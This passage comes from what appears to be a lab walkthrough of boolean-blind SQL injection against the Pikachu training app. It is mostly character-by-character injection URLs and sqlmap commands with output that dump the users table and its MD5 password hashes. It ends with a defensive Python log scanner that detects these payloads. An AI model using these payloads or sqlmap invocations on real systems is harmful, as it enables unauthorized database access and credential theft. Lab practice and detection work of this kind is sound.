http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 6, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 7, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: password
列 3: password
[*] 正在探测表 users 的第 4 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 1, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 3, 1) = 'v') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 4, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: level
列 4: level

(4) Probing the data

Next we probe the first row of the users table. As shown below, the username is admin and the stored password is the md5 value e10adc3949ba59abbe56e057f20f883e, from which the password can be inferred to be 123456.

[*] 开始提取 users.id 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT id FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT id FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: 1
4: 1

[*] 开始提取 users.username 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 5 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 1, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 4, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: admin
4: admin

[*] 开始提取 users.password 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT password FROM users LIMIT 0,1)) = 32) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 32 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 1, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 2, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 3, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 5, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 6, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 7, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 8, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 9, 1) = '4') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 10, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 11, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 12, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 13, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 14, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 15, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 16, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 17, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 18, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 19, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 20, 1) = '6') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 21, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 22, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 23, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 24, 1) = '7') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 25, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 26, 1) = '2') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 27, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 28, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 29, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 30, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 31, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 32, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: e10adc3949ba59abbe56e057f20f883e
4: e10adc3949ba59abbe56e057f20f883e

[*] 开始提取 users.level 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT level FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT level FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: 1
4: 1

3、sqlmap penetration testing

python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump

After running this command, sqlmap only finds a time-based injection technique; the output is shown below.

GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: name (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=mooyuan' AND (SELECT 7670 FROM (SELECT(SLEEP(5)))vJLD) AND 'Zxcy'='Zxcy&submit=%E6%9F%A5%E8%AF%A2

If the --technique=B parameter is added, the test fails outright and sqlmap reports that no injection point was found, as shown below.

[05:20:51] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=mn9mirug87r...aprvlnnef7'). Do you want to use those [Y/n] Y
[05:20:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:20:52] [INFO] testing if the target URL content is stable
[05:20:52] [INFO] target URL content is stable
[05:20:52] [INFO] testing if GET parameter 'name' is dynamic
[05:20:53] [WARNING] GET parameter 'name' does not appear to be dynamic
[05:20:53] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[05:20:53] [INFO] testing for SQL injection on GET parameter 'name'
[05:20:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:55] [WARNING] GET parameter 'name' does not seem to be injectable
[05:20:55] [INFO] testing if GET parameter 'submit' is dynamic
[05:20:55] [WARNING] GET parameter 'submit' does not appear to be dynamic
[05:20:55] [WARNING] heuristic (basic) test shows that GET parameter 'submit' might not be injectable
[05:20:55] [INFO] testing for SQL injection on GET parameter 'submit'
[05:20:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:59] [WARNING] GET parameter 'submit' does not seem to be injectable
[05:20:59] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[05:20:59] [WARNING] your sqlmap version is outdated

This is because, for boolean-based injection, sqlmap does not know what the True and False responses look like; once they are specified correctly (here with --not-string="不存在", the text the page shows when the username does not exist) the test succeeds. The command is shown below.

sqlmap -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump --technique=B --not-string="不存在"
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 13 HTTP(s) requests:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=mooyuan' AND 7085=7085 AND 'XcNF'='XcNF&submit=%E6%9F%A5%E8%AF%A2
---
Database: pikachu
Table: users
[3 entries]
+----+---------+-------------------------------------------+----------+
| id | level   | password                                  | username |
+----+---------+-------------------------------------------+----------+
| 1  | 1       | e10adc3949ba59abbe56e057f20f883e (123456) | admin    |
| 2  | 2       | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu  |
| 3  | 3       | e99a18c428cb38d5f260853678922e03 (abc123) | test     |
+----+---------+-------------------------------------------+----------+
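As an added example (not part of the original walkthrough or of the pikachu project), a defender-side Python scanner that decodes the name parameter from web-server access-log lines and flags the payload shapes seen above: the CASE WHEN/SUBSTRING probe used by the script, sqlmap's numeric and string tautologies, and the SLEEP probe. The log lines, the signature names and the regular expressions are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real logs): the first three mirror the
# payload shapes from this walkthrough, the fourth is a benign lookup.
SAMPLE_LOG = """\
192.168.59.1 - - [01/Jan/2025:10:00:00 +0800] "GET /pikachu/vul/sqli/sqli_blind_b.php/?name=lili%27+AND+%28CASE+WHEN+%28SUBSTRING%28%28SELECT+password+FROM+users+LIMIT+0%2C1%29%2C+1%2C+1%29+%3D+%27e%27%29+THEN+1+ELSE+%28SELECT+1+UNION+SELECT+2%29+END%29--+&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 512
192.168.59.1 - - [01/Jan/2025:10:00:01 +0800] "GET /pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan%27+AND+7085%3D7085+AND+%27XcNF%27%3D%27XcNF&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 512
192.168.59.1 - - [01/Jan/2025:10:00:02 +0800] "GET /pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan%27+AND+%28SELECT+7670+FROM+%28SELECT%28SLEEP%285%29%29%29vJLD%29+AND+%27Zxcy%27%3D%27Zxcy&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 512
192.168.59.1 - - [01/Jan/2025:10:00:03 +0800] "GET /pikachu/vul/sqli/sqli_blind_b.php?name=lili&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 512
"""

# Signatures (constructed) for the blind-injection shapes discussed on this page.
SIGNATURES = {
    "conditional probe (CASE WHEN + SUBSTRING)": re.compile(r"\bCASE\s+WHEN\b.*\bSUBSTR(?:ING)?\s*\(", re.I | re.S),
    "numeric tautology (AND n=n)": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "string tautology (AND 'x'='x)": re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\b", re.I),
    "time-based probe (SLEEP)": re.compile(r"\bSLEEP\s*\(", re.I),
    "comment terminator (-- or #)": re.compile(r"(?:--|#)\s*$"),
}

# Pulls the request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify_value(value):
    """Return the names of all signatures matched by one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_log(text):
    """Return (line_no, param, decoded_value, matched_signatures) for every suspicious parameter."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs turns '+' into spaces and percent-decodes, giving the value the DB saw
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for param, values in params.items():
            for value in values:
                matched = classify_value(value)
                if matched:
                    hits.append((line_no, param, value, matched))
    return hits


if __name__ == "__main__":
    for line_no, param, value, matched in scan_log(SAMPLE_LOG):
        print(f"line {line_no} param {param}: {', '.join(matched)}\n    {value}")
```

Matching on the decoded value rather than the raw URL is what makes the URL-encoded and `+`-spaced variants in the log hit the same signatures.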